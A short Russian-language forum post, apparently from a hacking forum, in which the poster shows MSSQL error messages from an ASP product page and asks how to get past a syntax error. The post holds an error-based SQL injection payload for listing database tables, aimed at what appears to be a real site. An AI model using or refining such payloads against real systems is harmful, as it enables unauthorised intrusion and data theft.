17.09.2007, 20:05
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Хм, у меня такая трабла, при инъекции в mssql при запросе с кавычкой выводится стандартная ошибка
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '5F42D5B0', 3, 1'.
/software/product.asp, line 62
Но при запросе, допустим
'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
Вылазает ошибка
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
/software/product.asp, line 62
Почему вылазает эта ошибка и как ее обойти ? |
|
|